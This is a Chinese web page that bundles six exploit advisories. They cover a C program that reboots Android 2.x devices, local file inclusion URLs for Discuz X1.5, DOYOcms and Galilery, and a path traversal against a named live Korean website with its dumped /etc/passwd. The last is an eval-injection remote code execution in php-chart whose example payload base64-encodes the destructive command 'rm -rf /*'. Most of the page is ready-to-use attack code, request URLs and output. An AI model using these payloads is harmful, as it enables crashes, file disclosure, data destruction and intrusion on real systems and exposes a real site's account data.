您现在的位置：首页 > 实用文 > 其他范文

Android Linux Kernel 2.6本地DoS漏洞预警

时间：2022-10-20 08:26:50 其他范文收藏本文下载本文

以下是小编收集整理的Android Linux Kernel 2.6本地DoS漏洞预警，本文共6篇，仅供参考，欢迎大家阅读。

篇1：Android Linux Kernel 2.6本地DoS漏洞预警

# Exploit Title: Android Kernel 2.6 Local DoS

# Date: 12/7/12 # Author: G13 # Twitter: @g13net # Versions: Android 2.2, 2.3 # Category: DoS (android)

保留以上原文信息

多次尝试执行将一个文件名长度大于或等于2048的文件写入到SD卡（vfat文件系统）时会引起Android操作系统产生一个本地DoS

利用条件：Linux Kernel 2.6（其实就是ICS以前的版本）

成功运行利用代码可以导致系统重启

#includeintmain(intargc,char**argv){charbuf[5000];intj,k;FILE*fp;/* Path to sdcard, typically /sdcard/ */strcpy(buf,“/sdcard/”);for(k=0;k<=2048;k++){strcat(buf,“A”);};for(j=0;j<=50;j++){fp=fopen(buf,“w”);};return0;}

以下是系统调试信息

*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** Build fingerprint: 'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys' pid: 349, tid: 363, name: SensorService >>>system_server <<< signal 8 (SIGFPE), code -6 (?), fault addr 0000015d r0 00000000 r1 00000008 r2 00000040 r3 00000000 r4 2a114310 r5 00000000 r6 51504690 r7 00000025 r8 2a114330 r9 2a114350 sl 00000003 fp 00000003 ip fffd4084 sp 51501eb0 lr 40039b70 pc 40037cf0 cpsr 0010 d0 4271bc7bd0b80000 d1 0000000000000000 d2 0000000000000000 d3 427181eae900 d4 0000000000000000 d5 0000000000000000 d6 0000000000000000 d7 0000000000000000 d8 0000000000000000 d9 0000000000000000 d10 0000000000000000 d11 0000000000000000 d12 0000000000000000 d13 0000000000000000 d14 0000000000000000 d15 0000000000000000 d16 3fe99999a0000000 d17 3fe999999999999a d18 0033003200310030 d19 0000000000000000 d20 3fc554e7eb0eb47c d21 3e66376972bea4d0 d22 3f4de16b9c24a98f d23 3fb0f4a31edab38b d24 3fede16b9c24a98f d25 3fe55559ee5e69f9 d26 0000000000000000 d27 0000000000000000 d28 0000000000000005 d29 0000000000000000 d30 0000000000000000 d31 0000000000000000 scr 20000010 backtrace: #00 pc 0000dcf0 /system/lib/libc.so (kill+12) #01 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #02 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #03 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #04 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #05 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #06 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #07 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #08 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #09 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #10 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #11 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #12 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #13 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #14 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #15 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8) #16 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)

篇2：DISCUZX1.5 本地文件包含漏洞漏洞预警

DISCUZX1.5 本地文件包含，当然是有条件的，就是使用文件作为缓存，

config_global.php

$_config['cache']['type'] = 'file';

function cachedata($cachenames) {

......

$isfilecache = getglobal('config/cache/type') == 'file';

......

if($isfilecache) {

$lostcaches = array;

foreach($cachenames as $cachename) {

if(!@include_once(DISCUZ_ROOT.'./data/cache/cache_'.$cachename.'.php')) {

$lostcaches[] = $cachename;

}

......

}

地址：

localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

Authracation has expiried

执行了 api/uc.php 页面代码了，

作者： Jannock

篇3：DOYOcms 本地文件包含漏洞漏洞预警

这是这套CMS ，这个很简洁，。。

这里的$handle_controller = syClass($__controller, null, $GLOBALS['G_DY'][“controller_path”].'/'.$__controller.“.php”);

接下来往下看

这里的$sdir 没有经过任何过滤来的，然后看下这个import函数

这里直接包含了该文件

require($sfilename);

所以结合前面的

$GLOBALS['G_DY'][“controller_path”].'/'.$__controller.“.php”

$__controller是我们可控的变量，也没有经过任何过滤，我们想可以通过%00截断，然后包含我们上传的文件就达到了目的

这也就是鸡肋的地方了，如果要截断，要保证php版本小于5.4(我自己也记不太清了) 因为高版本的修复了该截断的漏洞，

然后这里要保证魔术常量是关闭的。

下图就是成功包含的图

Exp：

localhost/test/index.php?c=../uploads//06/1.gif%00&a=type&tid=1

篇4：韩国站的本地包含洞漏洞预警

url：www.kptc.or.kr/plaza/law.html?url=/../../../....

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin urisystem:x:500:500::/home/urisystem:/bin/bash mysql:x:27:27:MySQL:/usr/local/mysql/var:/sbin/nologin apache:x:48:48:apache:/home/httpd:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin bncworld:x:502:100::/home/bncworld:/bin/bash healthju:x:503:100::/home/healthju:/bin/bash siskorea:x:504:100::/home/siskorea:/bin/bash sam2879:x:505:100::/home/sam2879:/bin/bash nesc:x:506:100::/home/nesc:/bin/bash kptc:x:508:100::/home/kptc:/bin/bash moonhak:x:509:100::/home/moonhak:/bin/bash eunjinmall:x:510:100::/home/eunjinmall:/bin/bash wla:x:511:100::/home/wla:/bin/bash master:x:512:512:eunjinmall.com:/home/eunjinmall/master:/bin/false chang:x:513:513:eunjinmall.com:/home/eunjinmall/chang:/bin/false eunjin:x:514:514:eunjinmall.com:/home/eunjinmall/eunjin:/bin/false buy09:x:515:100::/home/buy09:/bin/bash dailyecx:516:100::/home/dailyec/bin/bash shop_wla:x:517:100::/home/shop_wla:/bin/bash moonhak_wla:x:518:100::/home/moonhak_wla:/bin/bash koreatown21:x:519:519::/home/iloveyou:/bin/bash

篇5：Galilery 1.0本地文件包含漏洞漏洞预警

Galilery是一款使用PHP编写的开放源代码的相册系统，Galilery 1.0存在本地文件包含漏洞，可能导致敏感信息泄露，

[+]info:

~~~~~~~~~

Galilery 1.0 Local File Inclusion Vulnerability

$ cat 15_lfi_galilery.1.0.txt

# exploit title: local file include in Galilery 1.0

# date: 18.o2.2o11

# author: lemlajt

# software : Galilery

# version: 1.0

# tested on: linux

# cve :

# ftp.heanet.ie/disk1/sourceforge/g/project/ga/galilery/Galilery/

[+]poc:

~~~~~~~~~

localhost/www/cmsadmins/Galilery-1.0/index.php?pg=1&d=../../../../../../../../../../../../etc/

cuz:

index.php: $d=$_GET['d'];

[+]Reference:

~~~~~~~~~

www.exploit-db.com/exploits/16206

篇6：利用本地包含漏洞执行任意代码漏洞预警

影响程序: php-chart_v1.0

程序官方: php-charts.com/

缺陷类型: PHP Code Execution.

===============================================================

测试平台系统: Debian squeeze 6.0.6

服务器软件版本: Apache/2.2.16 (Debian)

PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)

================================================================

关于程序介绍:

Php-Charts is basically a class which can be used to generate

different charts(Bar, Pie, Doughnut etc.) in different format(PDF, PNG, JPG, HTML)

using different data source(csv, xml, MySQL, MS Sql, MS Access, PostgreSql,

user defined data).

================================================================

缺陷分析

root@debian:/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard# cat url.php

require(“../lib/phpchart.class.php”);

$color_var=array(“txt_col”,“line_col”,“bg_color”);

$cname=$_GET[“type”];

$chart=new PHPChart($cname);

foreach($_GET as $key=>$value)

{

if($value!=“”)

{

if(in_array($key,$color_var))

eval('$chart->'.$key.'=“#'.$value.'”;');

else if($value=='yes')

eval('$chart->'.$key.'=true;');

else if($value=='no')

eval('$chart->'.$key.'=false;');

else if(is_numeric($value))

eval('$chart->'.$key.'='.$value.';');

else

eval('$chart->'.$key.“='”.$value.“';”);

}

$chart->genChart();

利用:

root@debian:/tmp# wget ' www.myhack58.com //wp/chart/chart/wizard/url.php?${var_dump($_SERVER)}=IZABEKAILOVEYOUBABY' -O out.txt && cat out.txt

--2013-01-15 21:19:16-- hacker1.own//wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY

Resolving hacker1.own... 127.0.0.1

Connecting to hacker1.own|127.0.0.1|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: unspecified [text/html]

Saving to: “out.txt”

[ <=> ] 1,917 --.-K/s in 0s

2013-01-15 21:19:17 (8.56 MB/s) - “out.txt” saved [1917]

Notice: Undefined index: type in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php on line 4

array(28) {

[“DOCUMENT_ROOT”]=>

string(28) “/etc/apache2/htdocs/hacker1/”

[“GATEWAY_INTERFACE”]=>

string(7) “CGI/1.1”

[“HTTP_ACCEPT”]=>

string(3) “*/*”

[“HTTP_CLIENT_IP”]=>

string(9) “127.0.0.1”

[“HTTP_HOST”]=>

string(11) “hacker1.own”

[“HTTP_USER_AGENT”]=>

string(21) “Wget/1.12 (linux-gnu)”

[“HTTP_VIA”]=>

string(77) “http/1.0 debian[FE800000000000000A0027FFFE077FC6] (ApacheTrafficServer/3.2.0)”

[“HTTP_X_FORWARDED_FOR”]=>

string(9) “127.0.0.1”

[“PATH”]=>

string(4) “/bin”

[“PHPRC”]=>

string(14) “/etc/php5/cgi/”

[“QUERY_STRING”]=>

string(45) “$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY”

[“REDIRECT_STATUS”]=>

string(3) “200”

[“REMOTE_ADDR”]=>

string(9) “127.0.0.1”

[“REMOTE_PORT”]=>

string(5) “60830”

[“REQUEST_METHOD”]=>

string(3) “GET”

[“REQUEST_URI”]=>

string(76) “/wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY”

[“SCRIPT_FILENAME”]=>

string(57) “/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php”

[“SCRIPT_NAME”]=>

string(30) “/wp/chart/chart/wizard/url.php”

[“SERVER_ADDR”]=>

string(9) “127.0.0.1”

[“SERVER_ADMIN”]=>

string(21) “webmaster@hacker1.own”

[“SERVER_NAME”]=>

string(11) “hacker1.own”

[“SERVER_PORT”]=>

string(2) “80”

[“SERVER_PROTOCOL”]=>

string(8) “HTTP/1.1”

[“SERVER_SIGNATURE”]=>

string(0) “”

[“SERVER_SOFTWARE”]=>

string(6) “Apache”

[“UNIQUE_ID”]=>

string(24) “UPYOJH8AAQEAAE8eNfMAAAAC”

[“PHP_SELF”]=>

string(30) “/wp/chart/chart/wizard/url.php”

[“REQUEST_TIME”]=>

int(1358302756)

}

Notice: Undefined variable: in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1

Fatal error: Cannot access empty property in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1

root@debian:/tmp#

Example 2:

hacker1.own//wp/chart/chart/wizard/url.php?&123&${var_dump(system(base64_decode(cm0gLXJmIC8q)))}=123456LoL

=====================ENDS HERE============================

★马克斯CMScookies注入漏洞漏洞预警

★Apple QuickTime信息泄露漏洞漏洞预警

★iShowMusic V1.2 写入shell漏洞漏洞预警

★在线支付逻辑漏洞总结漏洞预警

★elasticsearch 漏洞利用工具套装漏洞预警

★渗透底层路由技术漏洞预警

★一个CGI程序的漏洞挖掘漏洞预警

★XPSHOP商城系统Cookies欺骗漏洞漏洞预警

★xheditor编辑器upload.php畸形文件上传漏洞漏洞预警

★青创文章系统简单分析漏洞预警

《Android Linux Kernel 2.6本地DoS漏洞预警（推荐6篇）.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

文档为doc格式

其他范文图文推荐

Android Linux Kernel 2.6本地DoS漏洞预警相关文章